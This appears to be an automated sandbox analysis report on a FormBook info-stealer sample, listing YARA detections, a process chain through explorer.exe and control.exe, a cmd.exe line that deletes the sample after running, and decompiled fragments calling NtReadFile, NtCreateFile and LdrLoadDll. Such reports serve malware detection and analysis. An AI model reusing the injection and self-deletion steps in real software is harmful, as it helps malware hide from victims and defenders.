Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\tgamf4XuLa.exe
Imagebase:	0x860000
File size:	548352 bytes
MD5 hash:	F8146A71DEDC3EEEAA1624D6832C39A4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 1956

General

Start time:	10:08:38
Start date:	15/09/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: control.exe PID: 6364 Parent PID: 3388

General

Start time:	10:09:17
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0xe60000
File size:	114688 bytes
MD5 hash:	40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6428 Parent PID: 6364

General

Start time:	10:09:26
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6436 Parent PID: 6428

General

Start time:	10:09:26
Start date:	15/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: tgamf4XuLa.exe PID: 6056 Parent PID: 852 tgamf4XuLa.exeCOMMON

Executed Functions

Function 0288DDCC, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0288FE0A

Memory Dump Source

Source File: 00000000.00000002.236653113.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: de295533d720ca4270455b7af787fcb16a26585ae70b04ffd7c5eac8bf8b4896
Instruction ID: 8163fd19296c52d9f072fb2358bf849830895f71c7dc1ae017371ea978f3937e
Opcode Fuzzy Hash: de295533d720ca4270455b7af787fcb16a26585ae70b04ffd7c5eac8bf8b4896
Instruction Fuzzy Hash: 3051CEB5D00308DFDB14DF99C884ADEBBB5FF48314F64852AE919AB210D774A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02883DE8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02885421

Memory Dump Source

Source File: 00000000.00000002.236653113.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f0d246a2eabf379778a1aa26b232502ada0c359d173c6d846edc600a597b9dbe
Instruction ID: cb3cf139eeca1b5daea8e14f818e4d7f419b61e37dc07d51a82c35c3d6615c0a
Opcode Fuzzy Hash: f0d246a2eabf379778a1aa26b232502ada0c359d173c6d846edc600a597b9dbe
Instruction Fuzzy Hash: D241E3B4C00618CFEB24DFA9C8447CEBBB5BF48308F618469D409BB251D775694ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 0288536E, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02885421

Memory Dump Source

Source File: 00000000.00000002.236653113.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8586a1b604a157a59c568ab8d327d0812f6597edc91dc4346e4964e2813394ae
Instruction ID: e9de58ee32c947bf6db69604a5f6d4de2cd2bdcc9c4c25fefbce759363507391
Opcode Fuzzy Hash: 8586a1b604a157a59c568ab8d327d0812f6597edc91dc4346e4964e2813394ae
Instruction Fuzzy Hash: AD41F3B4C00628CFDB24DFA9C8847CEBBB5BF48308F618469D408BB251D775694ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 02889800, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0288B87E,?,?,?,?,?), ref: 0288B93F

Memory Dump Source

Source File: 00000000.00000002.236653113.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d079d42b2611011dba0f38440f40c7361943cfaca59b0ef9dff24d34a83e5546
Instruction ID: aa006a49cb7af64183cda93741b0268c2faef10e24a328d9e90a94ae8f5330d6
Opcode Fuzzy Hash: d079d42b2611011dba0f38440f40c7361943cfaca59b0ef9dff24d34a83e5546
Instruction Fuzzy Hash: 0921E3B59002189FDB10CFA9D984ADEBBF8FB48324F14846AE914A3310D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02889478, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02889951,00000800,00000000,00000000), ref: 02889B62

Memory Dump Source

Source File: 00000000.00000002.236653113.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: cc46e707a3f14b1c0e4f66be2f1b01489d76dbe8884fa50ab816f62132a62fd1
Instruction ID: 09321ef4817ece87971ab546b4afb58736c9b1b991a5dd13835a17ec59920407
Opcode Fuzzy Hash: cc46e707a3f14b1c0e4f66be2f1b01489d76dbe8884fa50ab816f62132a62fd1
Instruction Fuzzy Hash: 261117B9900319DFDB10DF9AC444AEEFBF4EB48324F14852AD415A7300C3B4A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02889870, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 028898D6

Memory Dump Source

Source File: 00000000.00000002.236653113.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1e5bac40957262e45ba4561b29f258c1c1d1eda556134dca82bf8d399631122d
Instruction ID: 3f552153ac3112a09cb19e88407af5c1b39c9d4ec83ffa2be6d8ecbe5d7b6902
Opcode Fuzzy Hash: 1e5bac40957262e45ba4561b29f258c1c1d1eda556134dca82bf8d399631122d
Instruction Fuzzy Hash: BA110FB9D006498FDB10DF9AC444ADEFBF8EB88324F14842AD829A7700D378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0288DE04, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0288FF28,?,?,?,?), ref: 0288FF9D

Memory Dump Source

Source File: 00000000.00000002.236653113.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 5a39ed4b9a1763e464e3b962bb9326a5f23d1c6bb371e2908cee70f9a0fef082
Instruction ID: c2bd71169f298b049977f454adfb9ec527f6b185a62daed993aba2c08d5ac418
Opcode Fuzzy Hash: 5a39ed4b9a1763e464e3b962bb9326a5f23d1c6bb371e2908cee70f9a0fef082
Instruction Fuzzy Hash: 6D11F5B9900208DFDB10DF99D589BDEBBF8EB48324F108459E915A7640D3B4A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EED4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236305820.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b3751b869582c8d9b4fb5ef0b2863f58b1419c1c05056048eeebefd8b592ec8
Instruction ID: a9ded9966a4d23e1dc5fae30933ae91e8cb7755f19691a65d4caad3eab81e633
Opcode Fuzzy Hash: 5b3751b869582c8d9b4fb5ef0b2863f58b1419c1c05056048eeebefd8b592ec8
Instruction Fuzzy Hash: DF212571508288DFCB01DF14DDC0B66BF65FB8832CF24C969E8052B246C336D85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EED3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236305820.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a42f1e0f174a46c9a1ef8d27838945fedf1d8a01066ca270da1495f2141031f
Instruction ID: f3c8155a45319aae963f7a60eb5947985f5e1b3d67461b7162ffc6a24197d3c7
Opcode Fuzzy Hash: 4a42f1e0f174a46c9a1ef8d27838945fedf1d8a01066ca270da1495f2141031f
Instruction Fuzzy Hash: 0C213A71508288DFDB11DF50DDC0B56BBA5FBA4328F24C569E8095F286C336E856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 027AD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236502117.00000000027AD000.00000040.00000001.sdmp, Offset: 027AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6bfc21effba12b98a5aa0075d9141d418f07dfd1cbf78523108cbc6a04d6c1f
Instruction ID: 1b7d638d4a067c30e5b4e1b9a86e00046fd356153d8229e00e0afb36298a3b5a
Opcode Fuzzy Hash: b6bfc21effba12b98a5aa0075d9141d418f07dfd1cbf78523108cbc6a04d6c1f
Instruction Fuzzy Hash: BF21F571504240DFDB24CF64D9D5B57BB65FB88324F24CA69D8094B646C336D847CA61

Uniqueness

Uniqueness Score: -1.00%

Function 027AD1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236502117.00000000027AD000.00000040.00000001.sdmp, Offset: 027AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 180bee2f8a1e4984f6d7ebc38ef18e6e355091afd919bbda00569ad96c63c42f
Instruction ID: bb99095ba94710cb389fa9a80c922a0c77e2e732c3e259ff1a1ba81fa5ebe6dc
Opcode Fuzzy Hash: 180bee2f8a1e4984f6d7ebc38ef18e6e355091afd919bbda00569ad96c63c42f
Instruction Fuzzy Hash: C0210771504200EFDB21CF50D5D4B26BBA5FBC8338F24CAADD8095B695C336D846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 027AD007, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236502117.00000000027AD000.00000040.00000001.sdmp, Offset: 027AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83c29ceb702f7fa4c7fb1d9a6db7bc48f161635b25835999ba0b59c84fefdb2c
Instruction ID: b151bde272e67980550f6a6d38b505658b4d6b75b53fb8c337ca43c6a44238cb
Opcode Fuzzy Hash: 83c29ceb702f7fa4c7fb1d9a6db7bc48f161635b25835999ba0b59c84fefdb2c
Instruction Fuzzy Hash: 2B2162755093C09FCB12CF24D5A4716BF71EB86224F28C6DAD8498F697C33AD44ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00EED4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236305820.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 128fd73ab07cf1ef7f45b28ade464dc0fd3df560b24111eac77737300b91a524
Instruction ID: 9e0931675c11518809d703a77b29135cdee07f995375a0eca64d1b4f8f152611
Opcode Fuzzy Hash: 128fd73ab07cf1ef7f45b28ade464dc0fd3df560b24111eac77737300b91a524
Instruction Fuzzy Hash: 2211E676404284DFCF11CF10D9C4B56BF71FB84328F24C6A9D8455B656C336D85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EED3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236305820.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 128fd73ab07cf1ef7f45b28ade464dc0fd3df560b24111eac77737300b91a524
Instruction ID: ee4ef39333b2610fce44c3cf55c961261753de1ef13904e1b1d74844f3510c92
Opcode Fuzzy Hash: 128fd73ab07cf1ef7f45b28ade464dc0fd3df560b24111eac77737300b91a524
Instruction Fuzzy Hash: 5511E676404284DFCF11CF10D9C4B56BF71FB94324F24C6A9D8095B656C33AE85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 027AD1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236502117.00000000027AD000.00000040.00000001.sdmp, Offset: 027AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe34d699f56a74af971e24b0c23eb0cd8c51345579107932759f8639b4cb8e96
Instruction ID: bd6d02ab5915daad1005968c23019ebd60e89a05512f8ba13b800e5be065c421
Opcode Fuzzy Hash: fe34d699f56a74af971e24b0c23eb0cd8c51345579107932759f8639b4cb8e96
Instruction Fuzzy Hash: 30118B75904280DFCB11CF10D5D4B16BBA1FB84324F28C6A9D8494BA96C33AD45ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 00EED745, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236305820.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1634269398e61662a2d32769b3fccdfa48c3f9919be341a460d01da617e5e4d
Instruction ID: 3c470c20ae08b2db1d5f919a38fee4b727ae532f6b4ea9ad6dfc253f1f2844d0
Opcode Fuzzy Hash: b1634269398e61662a2d32769b3fccdfa48c3f9919be341a460d01da617e5e4d
Instruction Fuzzy Hash: E901F73100C3889AE7108B52CD84BA7BBDCEF41378F18995BED046E282E3789840CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00EED744, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236305820.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9554826d0f3ad30e44c81110d546175eef58b7d33037054ac8b0915a2c267622
Instruction ID: fb0fd1bd10b4bb0cf2338b6fed937529554a7da8614967b5699e246968727c36
Opcode Fuzzy Hash: 9554826d0f3ad30e44c81110d546175eef58b7d33037054ac8b0915a2c267622
Instruction Fuzzy Hash: D0F062714082849AE7108F16DC88BA2FB98EB91778F18C45AED085B396D3799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0288E570, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236653113.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9759e740818c8dbad849907bdeee0d81dfa8f2cbbd2f0fcf8f295d6cd161b38
Instruction ID: e905cd47ac903b19900880cbfccc8efd3074e88f4e77c694834e9ebdbdbe2b69
Opcode Fuzzy Hash: d9759e740818c8dbad849907bdeee0d81dfa8f2cbbd2f0fcf8f295d6cd161b38
Instruction Fuzzy Hash: AB12D7F9E917469AF310CF65E4981893B61B740329FD44A08D2622EAD5DBBC21FECF44

Uniqueness

Uniqueness Score: -1.00%

Function 0288C124, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236653113.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e51090b016d29d106fe34d4b649c74b1387a2171e562e62f36d379da693ba1a
Instruction ID: e39b986b8339c24b2d8cccaf387445f7f0e8aeacf7d37338dbf23ecde5de1d6c
Opcode Fuzzy Hash: 6e51090b016d29d106fe34d4b649c74b1387a2171e562e62f36d379da693ba1a
Instruction Fuzzy Hash: E4A16D3AE002098FCF09EFB5C88459EBBB2FF85304B15856AE905EB265DB31A915CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0288E561, Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.236653113.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f33b7c19ef33ba72a3ea8accac02c6cf4fcfedf41aa603a8ccf669be89f54b0a
Instruction ID: a32015b819d19c27b2a976735b596f599dfbd70a44f597234cf316ed8bad667f
Opcode Fuzzy Hash: f33b7c19ef33ba72a3ea8accac02c6cf4fcfedf41aa603a8ccf669be89f54b0a
Instruction Fuzzy Hash: 80C14AB9E917458AF310CF65E8881893B71BB45328F954A08D2622F6D5DFBC20FACF44

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: tgamf4XuLa.exe PID: 1956 Parent PID: 6056 tgamf4XuLa.exeCOMMON

Executed Functions

Function 0041826A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041826A(char __edx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v117;
				void* _t19;
				void* _t30;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				_v117 = __edx;
				_t14 = _a4;
				_t32 = _a4 + 0xc48;
				E00418DC0(_t30, _t14, _t32,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
				_t7 =  &_a32; // 0x413d52
				_t13 =  &_a8; // 0x413d52
				_t19 =  *((intOrPtr*)( *_t32))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36, _a40, _t31, _t34); // executed
				return _t19;
			}

0x0041826f
0x00418273
0x0041827f
0x00418287
0x00418292
0x004182ad
0x004182b5
0x004182b9

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: 9e7a95299fc4708b1da84032c4247f9b5813373f432d17ea3ab081537ee50b7e
Instruction ID: ca5233c58504a219e3ba17d962f1fd997b405f2fd4a2e96bb7906d5143691d30
Opcode Fuzzy Hash: 9e7a95299fc4708b1da84032c4247f9b5813373f432d17ea3ab081537ee50b7e
Instruction Fuzzy Hash: 95F0F9B2200108AFCB14CF99DC81DEB77A9AF9C354F15824DFA0DA7241DA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418273
0x0041827f
0x00418287
0x00418292
0x004182ad
0x004182b5
0x004182b9

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B20(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0(__ebx,  &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b3c
0x00409b3f
0x00409b44
0x00409b49
0x00409b53
0x00409b58
0x00409b5b
0x00409b5d
0x00409b65
0x00409b6a
0x00409b6a
0x00409b71
0x00409b79
0x00409b7c
0x00409b7e
0x00409b92
0x00000000
0x00409b94
0x00409b9a
0x00409b4e
0x00409b4e
0x00409b4e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181BA, Relevance: 1.5, APIs: 1, Instructions: 43
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E004181BA(void* __esi, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t21;
				void* _t31;
				void* _t33;

				_push(ds);
				asm("fist dword [esi]");
				_t33 = __esi + 1;
				asm("sbb byte [ecx], 0x55");
				_t15 = _v0;
				_push(_t33);
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DC0(_t31, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t21;
			}

0x004181ba
0x004181bb
0x004181bd
0x004181be
0x004181c3
0x004181c9
0x004181cf
0x004181d7
0x0041820d
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d5ad8f11b4d38d3bb7291e9a8471787610874b8a9499f8215f0b6d30c55de1e0
Instruction ID: 7cc44793394d280bb9596af14ff73af1fd8236442cf4713f9cf7eb31eab8aef4
Opcode Fuzzy Hash: d5ad8f11b4d38d3bb7291e9a8471787610874b8a9499f8215f0b6d30c55de1e0
Instruction Fuzzy Hash: 4E01E8B2205108AFCB08CF98DC81EDB37A9AF8C714F15814CFA5D97241C631E811CBA4

Uniqueness

Uniqueness Score: -1.00%
